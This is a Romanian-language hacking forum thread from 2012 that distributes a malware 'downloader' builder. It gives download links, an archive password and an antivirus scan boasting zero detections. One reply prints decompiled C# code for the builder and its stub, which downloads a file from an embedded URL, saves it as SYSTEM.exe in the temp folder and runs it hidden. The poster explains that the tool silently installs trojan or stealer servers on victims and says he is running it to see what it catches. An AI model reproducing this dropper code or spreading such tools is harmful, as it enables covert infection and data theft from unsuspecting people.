io.kent Posted September 17, 2012 Report Posted September 17, 2012 (edited) download : http://bit.ly/V3ehIIhttp://www.box.com/s/2bcb0749d55d90ab313fCODE: Pass: 7RK1zZumI5zfc7Password : DownloaderHumScan : NovirusThanksReport date: 2012-09-17 15:37:52 (GMT 1)File name: fuckyeah-downloader-exeFile size: 49152 bytesMD5 hash: 87e03e308ea182044a3eb95f588f347dSHA1 hash: 88fff92b82340b1cc32256c44b9d923a36bc2550Detection rate: 0 on 14 (0%)Status: CLEANAsquared 15:37:52 5.1.0.3 Avast 15:37:52 5.0 AVG 15:37:52 10.0.0.1190 Avira 15:37:52 7.11.7.12 BitDefender 15:37:52 7.0.0.2555 ClamAV 15:37:52 0.97.4 Comodo 15:37:52 1.0 DrWeb 15:37:52 5.0.2 Fprot 15:37:52 6.0 IkarusT3 15:37:52 T31001097 Panda 15:37:52 10.0.3.0 STOPZilla 15:37:52 5.0.0.0 TrendMicro 15:37:52 9.200.0.1012 VBA32 15:37:52 3.12.0.300Multi-Engine Antivirus Scanner - Services - NoVirusThanks.orgsursa: http://level-23.biz/forum/showthread.php?8082-FuckYeah-Downloader Edited September 17, 2012 by io.kent Quote
andreinick05 Posted September 17, 2012 Report Posted September 17, 2012 Si mai exact ce downloadeaza programul? Sau de pe ce site-uri? Quote
io.kent Posted September 17, 2012 Author Report Posted September 17, 2012 In mare parte de pe toate ! Quote
Slice228 Posted September 17, 2012 Report Posted September 17, 2012 La ce ai mai pus parola daca mai jos e decriptata? Quote
io.kent Posted September 17, 2012 Author Report Posted September 17, 2012 Slice228 poate cineva vrea sa decrypteze, de aia am pus, sursa parola, cryptata, si decryptata! Quote
andreinick05 Posted September 17, 2012 Report Posted September 17, 2012 'De pe toate' include si sharecash si restul site-urilor de genul asta? Quote
ICEBREAKER101010 Posted September 17, 2012 Report Posted September 17, 2012 (edited) Cred ca e virus.Sau ceva asemanator: private void Button1_Click(object sender, EventArgs e) { this.level23 = this.TextBox1.Text; if (File.Exists("/windows.exe")) { MyProject.Computer.FileSystem.DeleteFile("/windows.exe"); } File.Copy(Application.StartupPath + "/Mini.nano", Application.StartupPath + "/windows.exe"); File.AppendAllText(Application.StartupPath + "/windows.exe", "(RAMERA:_:HOT)" + this.level23); } private void Button2_Click(object sender, EventArgs e)Si mai jos aveti cod din Mini.nano care de fapt este un exe si am impresia ca e stubul: private void Form1_Load(object sender, EventArgs e) { string[] strArray = Strings.Split(File.ReadAllText(Application.StartupPath + "/windows.exe"), "(RAMERA:_:HOT)", -1, CompareMethod.Binary); MyProject.Computer.Network.DownloadFile(strArray[1], Path.GetTempPath() + "/SYSTEM.exe"); Process.Start(Path.GetTempPath() + "/SYSTEM.exe"); this.Hide(); this.Close(); } Edited September 17, 2012 by ICEBREAKER101010 Quote
io.kent Posted September 17, 2012 Author Report Posted September 17, 2012 (edited) Nu cred ca e virus,ca lam scanat.. lam luat de pe level, am pus sursa, acolo, acum o sa arunc o privire in el, profunda sa vad cei acolo cu private, mersi de informatie,edit// analiza facuta.. nu e viruswidwos exe e arhiva creata pentru downloaderMini.nano este stub.si RAMERA:_:HOT ESTE SPLITCURAT SI ANALIZAT Edited September 17, 2012 by io.kent Quote
ICEBREAKER101010 Posted September 17, 2012 Report Posted September 17, 2012 Nu cred ca e virus,ca lam scanat.. lam luat de pe level, am pus sursa, acolo, acum o sa arunc o privire in el, profunda sa vad cei acolo cu private, mersi de informatie,edit// analiza facuta.. nu e viruswidwos exe e arhiva creata pentru downloaderMini.nano este stub.si RAMERA:_:HOT ESTE SPLITCURAT SI ANALIZATSi system.exe? Quote
io.kent Posted September 17, 2012 Author Report Posted September 17, 2012 (edited) deci o explicatie complecta, acest downloader nu este sa descarci, programe, filme, sau mai stiu eu ce,, este sa descarci un server de trojan/stealer pus in web/ftp si cand victima executa serverul de downloader se descarca serverul de trojan/stealerde pe pagina respectiva web si se executeaza de mod invizibil, in carpeta C:\Documents and Settings\Equipo\Configuración local\Temp iti zic in spaniola ca numi iese in romana:( 12 ani plecat si imi cer scuze de greseli..asa in cazul acesta cu numele System.exe, în dowloaders sunt utilizate de serverul care a generat o greutate de obicei, mai putin de un server, criptat nbindeadoedit// dupa cum vad nu sti ce inseamna un downloader de aceasta clasa, numele e schimbat le pune el, presupun ca sa nusi dea seama victima, aceste downloaduri nu descarca programe, sau eu mai stiu ce, cum am specificat mai sus.. sper sa ma explic destul de clar Edited September 17, 2012 by io.kent Quote
ICEBREAKER101010 Posted September 17, 2012 Report Posted September 17, 2012 deci o explicatie complecta, acest downloader nu este sa descarci, programe, filme, sau mai stiu eu ce,, este sa descarci un server de trojan/stealer pus in web/ftp si cand victima executa serverul de downloader se descarca serverul de trojan/stealerde pe pagina respectiva web si se executeaza de mod invizibil, in carpeta C:\Documents and Settings\Equipo\Configuración local\Temp iti zic in spaniola ca numi iese in romana:( 12 ani plecat si imi cer scuze de greseli..asa in cazul acesta cu numele System.exe, în dowloaders sunt utilizate de serverul care a generat o greutate de obicei, mai putin de un server, criptat nbindeadoAcum s-a facut lumina.Pacat ca nu e downloader din ala de pe mai multe hosturi ca premium... Quote
io.kent Posted September 17, 2012 Author Report Posted September 17, 2012 asa e, dar si mai mare pacat ca nu castigam la loterie, cu totii..trebuie sa ne multumim cu putin si folositor, acum iam dat drumul la program, mai incolo revin cu un edit, sa vad ce prinde! o dupa amiaza placuta tuturor.. Quote
io.kent Posted September 17, 2012 Author Report Posted September 17, 2012 cred ca nu esti atent la ceea ce sa explicat aici, citeste comentarile, in schimb daca te gandesti la server/trojan/stealer/ftp, nu stiu, iam dat drumul sa vad ce prinde! Quote